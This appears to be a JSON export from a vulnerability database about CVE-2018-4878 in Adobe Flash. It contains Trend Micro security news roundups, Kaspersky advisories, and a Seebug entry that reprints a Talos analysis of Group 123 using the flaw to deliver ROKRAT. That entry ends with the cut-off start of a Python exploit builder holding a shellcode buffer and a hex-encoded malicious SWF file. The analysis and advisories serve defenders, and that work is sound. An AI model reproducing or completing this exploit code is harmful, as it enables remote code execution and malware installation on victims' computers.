"https://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-february-5-2018/", "type": "trendmicroblog", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of February 5, 2018", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-02-18T14:50:25", "bulletinFamily": "blog", "cvelist": ["CVE-2018-4878"], "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, North Korean hackers overtook Adobe, Trend Micro Safety Solutions discovered new a botnet, and the threat of third-party cyber breaches made large corporations rethink their strategy.\n\nRead on to learn more.\n\n \n\n \n\n[**Winter Olympics\u2019 Security on Alert, but Hackers Have a Head Start**](<https://www.nytimes.com/2018/02/08/technology/winter-olympics-hackers.html>)\n\n_The Department of Homeland Security is warning Americans planning to attend the 2018 Winter Olympic Games in Pyeongchang that cybercriminals are likely to be targeting the Games._\n\n[**Malicious Chrome Extensions Found in Chrome Web Store, Form Droidclub Botnet**](<https://blog.trendmicro.com/trendlabs-security-intelligence/malicious-chrome-extensions-found-chrome-web-store-form-droidclub-botnet/>)\n\n_The Trend Micro Cyber Safety Solutions team has discovered a new botnet delivered via Chrome extensions that affect hundreds of thousands of users._** **\n\n[**Detecting New Threats via Contextual Information and Reputation**](<https://blog.trendmicro.com/trendlabs-security-intelligence/xgen-detection-new-threats/>)\n\n_How the increase in adoption of polymorphism and packing has made traditional signature-based detection at the client side (endpoint) obsolete._** **\n\n[**How hackers recycle top threats**](<https://blog.trendmicro.com/how-hackers-recycle-top-threats/>)\n\n_According to Trend Micro's 2018 report, experts forecast that infection techniques like those used to spread email and web-based spam will resurface in connection with the fake news triangle. _\n\n[**North Korean Hackers Allegedly Exploit Adobe Flash Player Vulnerability (CVE-2018-4878) Against South Korean Targets**](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/north-korean-hackers-allegedly-exploit-adobe-flash-player-vulnerability-cve-2018-4878-against-south-korean-targets>)\n\n_The South Korean Computer Emergency Response Team (KR-CERT) warned of a zero-day vulnerability in Adobe Flash player that could be maliciously exploited. _\n\n[**Uber says hackers behind 2016 data breach were in Canada, Florida**](<https://www.reuters.com/article/us-uber-cyber-congress/uber-says-hackers-behind-2016-data-breach-were-in-canada-florida-idUSKBN1FQ2YO>)\n\n_John Flynn testified to a U.S. congressional committee on February 6th. Uber had disclosed the breach of 57 million worldwide users in November, about a year after it occurred._\n\n[**These industries are the most vulnerable to data breaches in the United States**](<https://www.sharefile.com/blog/top-industries-affected-by-data-leaks-in-2017/>)\n\n_According to Citrix ShareFile\u2019s research, healthcare is the most vulnerable industry to data breaches, with 328 leaks (nearly 60% of all leaks in 2017) at an estimated cost of almost $1.2 billion. _\n\n[**How artificial intelligence is unleashing a new type of cybercrime**](<https://www.techrepublic.com/article/how-artificial-intelligence-is-unleashing-a-new-type-of-cybercrime/>)\n\n_Rather than hiding behind a mask to rob a bank, criminals are now hiding behind artificial intelligence to do their attack. However, financial institutions can use AI as well to combat these crimes._\n\n[**Third party cyber breach risk set to rise**](<http://www.computerweekly.com/news/252434580/Third-party-cyber-breach-risk-set-to-rise>)\n\n_Third party cyber security risk should always have been a priority, but this has never been more important than it is now in light of new technology risks and data protection regulations._\n\nDid any of these articles stand out to you? Let me know your thoughts below, or follow me on Twitter; [@JonLClay.](<https://twitter.com/jonlclay>)", "modified": "2018-02-09T14:00:56", "published": "2018-02-09T14:00:56", "id": "TRENDMICROBLOG:D07F262A5F92BE131EF59AA1DD863465", "href": "https://blog.trendmicro.com/week-security-news-botnets-breaches/", "type": "trendmicroblog", "title": "This Week in Security News: Botnets and Breaches", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-09T14:52:04", "bulletinFamily": "blog", "cvelist": ["CVE-2018-4878"], "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, the U.S. official in charge of election security was replaced, Trend Micro hosted a tea party in rural Taiwan, and a new cryptocurrency minor was discovered through an Oracle patch.\n\nRead on to learn more.\n\n[**2017 Mobile Threat Landscape**](<https://www.trendmicro.com/vinfo/us/security/research-and-analysis/threat-reports/roundup/2017-mobile-threat-landscape>)\n\n_If mobile threats _[_diversified and expanded in 2016_](<https://blog.trendmicro.com/trendlabs-security-intelligence/2016-mobile-threat-landscape/>)_, they matured in 2017. Mobile ransomware continued to rear its head, burgeoning into the platform\u2019s most prevalent threat. Simple screenlockers, for instance, evolved into file-encrypting malware, some of which __even seemed to keep pace with their desktop counterparts in terms of malicious routines. _\n\n[**A Look Into the Most Noteworthy Home Network Security Threats of 2017**](<https://www.trendmicro.com/vinfo/us/security/research-and-analysis/threat-reports/roundup/a-look-into-the-most-noteworthy-home-network-security-threats-of-2017>)\n\n_Routers are the gateways to all internet-connected devices in homes. They could also be potentially welcoming a bevy of home network threats risking users\u2019 information and security. Here we review the most noteworthy home network security events of 2017._\n\n[**5 Cybersecurity Trends to Watch in 2018**](<https://www.inc.com/james-paine/dont-miss-these-5-cyber-security-trends-in-2018.html>)\n\n_Inc. contributor, James Paine, sums up his top five trends to watch in cybersecurity: AI/machine learning, proactivity and preparation, GDPR, late adopters and talent shortages._\n\n[**New Campaign Exploits CVE-2018-4878 Anew via Malicious Microsoft Word Documents**](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/new-campaign-exploits-cve-2018-4878-anew-via-malicious-microsoft-word-documents>)\n\n_On February 6, Adobe released a security update in Flash version 28.0.0.161 meant to address _[_CVE-2018-4878_](<https://nvd.nist.gov/vuln/detail/CVE-2018-4878>)_, _[_a zero-day remote code execution vulnerability in Adobe Flash Player_](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/north-korean-hackers-allegedly-exploit-adobe-flash-player-vulnerability-cve-2018-4878-against-south-korean-targets>)_ that attackers exploited through the use of lure documents sent to victims via phishing emails. _\n\n[**OMG Mirai Variant Turns IoT Devices Into Proxy Servers**](<https://www.trendmicro.com/vinfo/us/security/news/internet-of-things/omg-mirai-variant-iot-devices-proxy-servers>)\n\n_A new Mirai variant, dubbed as OMG (detected by Trend Micro as ELF_MIRAI.AUSX), was found targeting Internet of Things (IoT) devices and turning them into proxy servers. _\n\n[**A Tea Party with a Difference: Trend Micro Supports Arts and Cultural Education in Rural Taiwan**](<https://blog.trendmicro.com/tea-party-difference-trend-micro-supports-arts-cultural-education-rural-taiwan/>)\n\n_CCO and Trend Micro and Chairman of Trend Micro Education Foundation recently went to a Taiwanese elementary school to raise funds to support its traditional Chinese orchestra._\n\n[**Exclusive: U.S. official focused on election security will be replaced**](<https://www.reuters.com/article/us-usa-cyber-election-masterson-exclusiv/exclusive-u-s-official-focused-on-election-security-will-be-replaced-idUSKCN1G62NI.>)\n\n_The head of a federal commission who has helped U.S. states protect election systems from possible cyber-attacks by Russia or others is being replaced. _\n\n[**46% of Orgs Never Change Cybersecurity Strategy, Even After Attack Or Breach**](<https://www.techrepublic.com/article/46-of-orgs-never-change-cybersecurity-strategy-even-after-attack-or-breach/>)\n\n_Despite an increasingly sophisticated cyber threat landscape, some 46% of 1,300 IT professionals and business leaders surveyed said that their organization's security strategy rarely changes._\n\n[**VPN 101 \u2013 Part 1: What You Need to Know to Stay Safe and Protect Your Privacy Online**](<https://blog.trendmicro.com/vpn-101-part-1-need-know-stay-safe-protect-privacy-online/>)\n\n_Trend Micro\u2019s local VPN in Content Shield\u2014part of Trend Micro Mobile Security for iOS\u2014focuses on web threat and web content filtering._\n\n[**Oracle Server Vulnerability Exploited to Deliver Double Monero Miner Payloads**](<https://blog.trendmicro.com/trendlabs-security-intelligence/oracle-server-vulnerability-exploited-deliver-double-monero-miner-payloads/>)\n\n_A patched Oracle WebLogic WLS-WSAT is being abused to deliver two different cryptocurrency miners: a 64-bit variant and a 32-bit variant of an XMRig Monero miner._\n\n[**Cryptocurrency-Mining Malware: 2018\u2019s New Menace?**](<https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-mining-malware-2018-new-menace/>)\n\n_The popularity and increasing real-world significance of cryptocurrencies are also drawing cybercriminal attention \u2014 so much so that it appears to keep pace with ransomware\u2019s infamy in the threat landscape._\n\n[**Intel's Spectre fix for Broadwell and Haswell chips has finally landed**](<http://www.zdnet.com/article/intels-spectre-fix-for-broadwell-and-haswell-chips-has-finally-landed/>)\n\n_Intel has released new microcode updates to address the Spectre Variant 2 flaw._\n\n[**Why Cybersecurity Is About More Than Prevention-Focused Products**](<https://www.forbes.com/sites/forbestechcouncil/2018/02/28/why-cybersecurity-is-about-more-than-prevention-focused-products/#51ac412e7408>)\n\n_Forbes Tech Council member Brian NeSmith shares tips on how to beef up cybersecurity._\n\n[**Cyber 'Shark', Robert Herjavec, Advocates Maintaining 'Cyber-Hygiene' For Businesses (Part 1)**](<https://www.forbes.com/sites/andrewrossow/2018/02/28/cyber-shark-robert-herjavec-advocates-maintaining-cyber-hygiene-for-businesses-part-1/#2b3cd716d8da>)\n\n_Forbes sits down for an interview with cyber security guru and entrepreneur thought leader, Robert Herjavec, to discuss the state of the cybersecurity industry today._\n\nDid any of these articles teach you something? Let me know your thoughts below, or follow me on Twitter: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: Trends and Tea Parties](<https://blog.trendmicro.com/week-security-news-trends-tea-parties/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2018-03-02T14:35:07", "published": "2018-03-02T14:35:07", "href": "https://blog.trendmicro.com/week-security-news-trends-tea-parties/", "id": "TRENDMICROBLOG:0B24CF652B6ADAB5E1BE333A26A02E21", "type": "trendmicroblog", "title": "This Week in Security News: Trends and Tea Parties", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "kaspersky": [{"lastseen": "2020-09-02T11:46:58", "bulletinFamily": "info", "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "description": "### *Detect date*:\n03/12/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Adobe Flash Player. Malicious users can exploit these vulnerabilities to execute arbitrary code.\n\n### *Affected products*:\nAdobe Flash Player earlier than 29.0.0.113\n\n### *Solution*:\nUpdate to the latest version \n[Download Adobe Flash Player](<https://get.adobe.com/ru/flashplayer/>)\n\n### *Original advisories*:\n[APSB18-05](<https://helpx.adobe.com/security/products/flash-player/apsb18-05.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Flash Player ActiveX](<https://threats.kaspersky.com/en/product/Adobe-Flash-Player-ActiveX/>)\n\n### *CVE-IDS*:\n[CVE-2018-4920](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4920>)10.0Critical \n[CVE-2018-4919](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4919>)10.0Critical", "edition": 37, "modified": "2020-05-22T00:00:00", "published": "2018-03-12T00:00:00", "id": "KLA11208", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11208", "title": "\r KLA11208Multiple vulnerabilities in Adobe Flash Player ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T12:00:27", "bulletinFamily": "info", "cvelist": ["CVE-2018-4878", "CVE-2018-4877"], "description": "### *Detect date*:\n02/01/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple use-after-free vulnerabilitires was found in Adobe Flash Player. By exploiting these vulnerabilities malicious users can execute arbitrary code. These vulnerabilities can be exploited remotely via a specially crafted Office documents with embedded malicious Flash content.\n\n### *Affected products*:\nAdobe Flash Player earlier than 28.0.0.161\n\n### *Solution*:\nUpdate to the latest version \n[Download Adobe Flash Player](<https://get.adobe.com/ru/flashplayer/>)\n\n### *Original advisories*:\n[APSB18-03](<https://helpx.adobe.com/security/products/flash-player/apsb18-03.html>) \n[APSA18-01](<https://helpx.adobe.com/security/products/flash-player/apsa18-01.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Flash Player ActiveX](<https://threats.kaspersky.com/en/product/Adobe-Flash-Player-ActiveX/>)\n\n### *CVE-IDS*:\n[CVE-2018-4878](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4878>)7.5Critical \n[CVE-2018-4877](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4877>)10.0Critical\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 39, "modified": "2020-06-18T00:00:00", "published": "2018-02-01T00:00:00", "id": "KLA11191", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11191", "title": "\r KLA11191Multiple use-after-free vulnerabilities in Adobe Flash Player ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:49:30", "bulletinFamily": "info", "cvelist": ["CVE-2018-4871"], "description": "### *Detect date*:\n01/09/2017\n\n### *Severity*:\nWarning\n\n### *Description*:\nOut-of-bounds read vulnerability in Adobe Flash Player can be exploited locally to obtain sensitive information.\n\n### *Affected products*:\nAdobe Flash Player versions earlier than 28.0.0.137\n\n### *Solution*:\nUpdate to the latest version \n[Download Adobe Flash Player](<https://get.adobe.com/ru/flashplayer/>)\n\n### *Original advisories*:\n[APSB18-01](<https://helpx.adobe.com/security/products/flash-player/apsb18-01.html>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Adobe Flash Player ActiveX](<https://threats.kaspersky.com/en/product/Adobe-Flash-Player-ActiveX/>)\n\n### *CVE-IDS*:\n[CVE-2018-4871](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4871>)5.0Critical\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2017-01-09T00:00:00", "id": "KLA11171", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11171", "title": "\r KLA11171OSI vulnerability in Adobe Flash Player ", "type": "kaspersky", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2018-02-23T18:34:30", "description": "### EXECUTIVE SUMMARY\r\n\r\nThe 1st of February, Adobe published an advisory concerning a Flash vulnerability (CVE-2018-4878). This vulnerability is a use after free that allows Remote Code Execute through a malformed Flash object. Additionally KISA (Korean CERT) published an [advisory](https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=26998) about a Flash 0-day used in the wild. Talos identified that an attacker exploited this vulnerability with a Flash object embedded in a Microsoft Excel document. By opening the document, the exploit was executed in order to download an additional payload from a compromised website.\r\n\r\nWe identified that the downloaded payload is the well-known Remote Administration Tool named ROKRAT. We already extensively spoke about this RAT on several articles in this blog: [here](http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html), [here](http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html), [here](http://blog.talosintelligence.com/2017/04/introducing-rokrat.html) and [here](http://blog.talosintelligence.com/2017/02/korean-maldoc.html). It is particularity used with cloud platforms in order to exfiltrate documents and manage infected systems.\r\n\r\n\r\n\r\n### FLASH 0-DAY: CVE-2018-4878\r\n\r\nThe campaign started by a malicious Microsoft Excel sheet:\r\n\r\n\r\n\r\n\r\nThis malicious document contains an ActiveX object. This object is a SWF file (Flash). The CVE-2018-4878 use after free vulnerability is used in order to download an additional payload from a compromised web server. This payload is a shellcode loaded in memory and executed. We identified Flash exploits from November 2017. Here is the exploit workflow:\r\n\r\n\r\n\r\n### CC & ROKRAT PAYLOAD\r\n\r\nAs explained previously, the purpose of the exploit is to download and execute an additional payload on the Internet. Here are some URLs where this additional payload was downloaded:\r\n\r\n* hxxp://www[.]1588-2040[.]co[.]kr/conf/product_old.jpg\r\n* hxxp://www[.]1588-2040[.]co[.]kr/design/m/images/image/image.php\r\n* hxxp://www[.]korea-tax[.]info/main/local.php\r\n* hxxp://www[.]dylboiler[.]co[.]kr/admincenter/files/board/4/manager.php\r\n\r\n\r\nAll these URLs are compromised websites located in South Korea. We identified that several of these URLs hosted a shellcode used to unpack and execute a ROKRAT variant. Here is the PDB of this sample:\r\n```\r\nd:\\HighSchool\\version 13\\2ndBD\\T+M\\T+M\\Result\\DocPrint.pdb\r\n```\r\n\r\nIt's the same PDB that was previously identified during our investigations. The exploit was used to drop ROKRAT on compromised systems. One of the ROKRAT samples identified used a naming reference to Hancom Secure AnySign. It is a reference to a legitimate application developed by Hancom Secure for PKI & authentication mechanisms. It is a software application used to protect user data and is massively used in South Korea.\r\n\r\n### CONCLUSION\r\n\r\nGroup 123 have now joined some of the criminal elite with this latest payload of ROKRAT. They have used an Adobe Flash 0-day which was outside of their previous capabilities - they did use exploits in previous campaigns but never a net new exploit as they have done now. This change represents a major shift in Group 123s maturity level, we can now confidentially assess Group 123 has a highly skilled, highly motivated and highly sophisticated group. Whilst Talos do not have any victim information related to this campaign we suspect the victim has been a very specific and high value target. Utilizing a brand new exploit, previously not seen in the wild, displays they were very determined to ensure their attack worked.\r\n\r\nIn January 2018 we produced a write up '[Korea In The Crosshair](http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html)' detailing the campaigns previously carried out by Group 123. In this write up we explained this would not be the last time we witness attacks from this threat actor and that we would expect them to continue to evolve. Within a few weeks we have witnessed the evolution of Group 123 and we will continue to monitor the threat landscape for this group.\r\n\r\n### COVERAGE\r\n\r\nAdditional ways our customers can detect and block this threat are listed below.\r\n\r\n\r\n\r\n\r\nAdvanced Malware Protection ([AMP](https://www.cisco.com/c/en/us/products/security/advanced-malware-protection)) is ideally suited to prevent the execution of the malware used by these threat actors.\r\n\r\n[CWS](https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html) or [WSA](https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html) web scanning prevents access to malicious websites and detects malware used in these attacks.\r\n\r\n[Email Security](https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html) can block malicious emails sent by threat actors as part of their campaign.\r\n\r\nNetwork Security appliances such as [NGFW](https://www.cisco.com/c/en/us/products/security/firewalls/index.html), [NGIPS](https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html), and [Meraki MX](https://meraki.cisco.com/products/appliances) can detect malicious activity associated with this threat.\r\n\r\n[AMP Threat Grid](https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html) helps identify malicious binaries and build protection into all Cisco Security products.\r\n\r\n[Umbrella](https://umbrella.cisco.com/), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.\r\n\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](https://www.snort.org/products).\r\n\r\n### IOCS\r\n\r\nFlash exploits:\r\n\r\nfec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0\r\n\r\n3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c\r\n\r\nROKRAT sample:\r\n\r\nE1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd\r\n\r\nURL:\r\n\r\nhxxp://www[.]1588-2040[.]co[.]kr/conf/product_old.jpg\r\n\r\nhxxp://www[.]1588-2040[.]co[.]kr/design/m/images/image/image.php\r\n\r\nhxxp://www[.]korea-tax[.]info/main/local.php\r\n\r\nhxxp://www[.]dylboiler[.]co[.]kr/admincenter/files/board/4/manager.php", "published": "2018-02-23T00:00:00", "type": "seebug", "title": "Adobe Flash Player Use After Free Remote Code Execution Vulnerability(CVE-2018-4878)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4878"], "modified": "2018-02-23T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-97136", "id": "SSV:97136", "sourceData": "\n #!/usr/bin/env python\r\n# coding: UTF-8\r\n\r\nbuf = \"\"\r\nbuf += \"\\xbb\\xbf\\x0d\\x92\\xf0\\xd9\\xe1\\xd9\\x74\\x24\\xf4\\x5a\\x33\"\r\nbuf += \"\\xc9\\xb1\\x3e\\x83\\xea\\xfc\\x31\\x5a\\x11\\x03\\x5a\\x11\\xe2\"\r\nbuf += \"\\x4a\\xd7\\x53\\x29\\xc0\\xcc\\xa7\\x92\\x92\\x86\\xf4\\xc8\\x38\"\r\nbuf += \"\\xa9\\xcd\\xbe\\x84\\xfb\\x9d\\xd7\\xf7\\xab\\x0a\\x5b\\xbc\\xf3\"\r\nbuf += \"\\x3c\\x74\\xb4\\x16\\xfb\\x82\\xf2\\x59\\x1b\\xe2\\xbc\\x32\\x48\"\r\nbuf += \"\\xdc\\xd5\\xe6\\x44\\x30\\x8d\\x22\\xc7\\xc4\\xdd\\x90\\x14\\x2c\"\r\nbuf += \"\\x36\\x10\\x15\\x0f\\x5c\\xf7\\x75\\x14\\xb1\\x3d\\x1e\\xb5\\xde\"\r\nbuf += \"\\x08\\x0b\\xcd\\xcf\\x67\\x5d\\xd0\\x74\\x27\\x26\\x60\\xc6\\xb1\"\r\nbuf += \"\\x32\\x61\\xfc\\x53\\x87\\xeb\\xb3\\x98\\x1f\\xf0\\x09\\x62\\xc5\"\r\nbuf += \"\\x7a\\x91\\xf9\\xba\\xa1\\x90\\xff\\xee\\x77\\xbd\\x2b\\x29\\xeb\"\r\nbuf += \"\\xf5\\x38\\x8a\\x46\\x98\\x7a\\xad\\xe2\\xec\\x97\\x9c\\x13\\xf4\"\r\nbuf += \"\\x61\\xf7\\x91\\x49\\x52\\xe8\\x84\\x32\\xef\\xc4\\x44\\xbb\\x4a\"\r\nbuf += \"\\x38\\xbc\\xe9\\x90\\xe2\\x75\\x33\\x28\\x85\\xdb\\x99\\x77\\xf8\"\r\nbuf += \"\\x05\\xd8\\xf6\\x60\\xd8\\x29\\xe5\\x7c\\x2e\\x32\\x17\\x8d\\x4f\"\r\nbuf += \"\\x96\\x21\\x6d\\x01\\x4b\\xdf\\xc9\\x3e\\x73\\x46\\x22\\xd4\\x20\"\r\nbuf += \"\\x60\\x39\\x38\\x5d\\x76\\x0a\\x0a\\xdb\\xc3\\xe7\\xd7\\xe8\\x5a\"\r\nbuf += \"\\xff\\x8e\\xb5\\x36\\xb6\\xc9\\x2e\\xa5\\xfd\\xca\\xad\\x77\\xb5\"\r\nbuf += \"\\x57\\x94\\xd5\\x64\\x78\\x93\\x2e\\xe7\\xc9\\xbd\\x65\\x43\\x9d\"\r\nbuf += \"\\xa9\\xde\\x39\\x69\\x3d\\x63\\x9c\\xe0\\x64\\x42\\x3b\\x4a\\xb6\"\r\nbuf += \"\\x86\\x62\\x21\\xed\\xb2\\x5f\\xfb\\xf6\\x42\\x05\\x16\\xe3\\x36\"\r\nbuf += \"\\x19\\xd7\\x93\\xb0\\x26\\x06\\x77\\xa7\\x1a\\x00\\x5e\\x2b\\x82\"\r\nbuf += \"\\x3f\"\r\n\r\n\r\n\r\npayload = buf\r\ndata = \"\"\r\nstageless = True\r\nflash_name = \"exploit\"\r\n\r\nif stageless is True:\r\n data = \"\\x46\\x57\\x53\\x20\\xE7\\x66\\x03\\x00\\x78\\x00\\x04\\xE2\\x00\\x00\\x0E\\xA6\\x00\\x00\\x18\\x01\\x00\\x44\\x11\\x19\\x00\\x00\\x00\\x7F\\x13\\x1F\\x02\\x00\\x00\\x3C\\x72\\x64\\x66\\x3A\\x52\\x44\\x46\\x20\\x78\\x6D\\x6C\\x6E\\x73\\x3A\\x72\\x64\\x66\\x3D\\x22\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x77\\x33\\x2E\\x6F\\x72\\x67\\x2F\\x31\\x39\\x39\\x39\\x2F\\x30\\x32\\x2F\\x32\\x32\\x2D\\x72\\x64\\x66\\x2D\\x73\\x79\\x6E\\x74\\x61\\x78\\x2D\\x6E\\x73\\x23\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x3C\\x72\\x64\\x66\\x3A\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x20\\x78\\x6D\\x6C\\x6E\\x73\\x3A\\x64\\x63\\x3D\\x22\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x70\\x75\\x72\\x6C\\x2E\\x6F\\x72\\x67\\x2F\\x64\\x63\\x2F\\x65\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x73\\x2F\\x31\\x2E\\x31\\x22\\x20\\x72\\x64\\x66\\x3A\\x61\\x62\\x6F\\x75\\x74\\x3D\\x22\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x66\\x6F\\x72\\x6D\\x61\\x74\\x3E\\x61\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x2F\\x78\\x2D\\x73\\x68\\x6F\\x63\\x6B\\x77\\x61\\x76\\x65\\x2D\\x66\\x6C\\x61\\x73\\x68\\x3C\\x2F\\x64\\x63\\x3A\\x66\\x6F\\x72\\x6D\\x61\\x74\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x74\\x69\\x74\\x6C\\x65\\x3E\\x41\\x64\\x6F\\x62\\x65\\x20\\x46\\x6C\\x65\\x78\\x20\\x34\\x20\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x74\\x69\\x74\\x6C\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x70\\x72\\x6F\\x64\\x75\\x63\\x74\\x73\\x2F\\x66\\x6C\\x65\\x78\\x3C\\x2F\\x64\\x63\\x3A\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x70\\x75\\x62\\x6C\\x69\\x73\\x68\\x65\\x72\\x3E\\x75\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x70\\x75\\x62\\x6C\\x69\\x73\\x68\\x65\\x72\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x63\\x72\\x65\\x61\\x74\\x6F\\x72\\x3E\\x75\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x63\\x72\\x65\\x61\\x74\\x6F\\x72\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x6C\\x61\\x6E\\x67\\x75\\x61\\x67\\x65\\x3E\\x45\\x4E\\x3C\\x2F\\x64\\x63\\x3A\\x6C\\x61\\x6E\\x67\\x75\\x61\\x67\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x64\\x61\\x74\\x65\\x3E\\x46\\x65\\x62\\x20\\x36\\x2C\\x20\\x32\\x30\\x31\\x38\\x3C\\x2F\\x64\\x63\\x3A\\x64\\x61\\x74\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x3C\\x2F\\x72\\x64\\x66\\x3A\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x20\\x3C\\x2F\\x72\\x64\\x66\\x3A\\x52\\x44\\x46\\x3E\\x0D\\x0A\\x00\\xD0\\x0F\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x10\\xE8\\x03\\x3C\\x00\\x43\\x02\\xFF\\xFF\\xFF\\xC8\\x0A\\x66\\x6C\\x61\\x73\\x68\\x30\\x32\\x00\\xFF\\x15\\x86\\x2C\\x03\\x00\\x02\\x00\\x00\\x00\\x00\\x00\"\r\nelse:\r\n data = 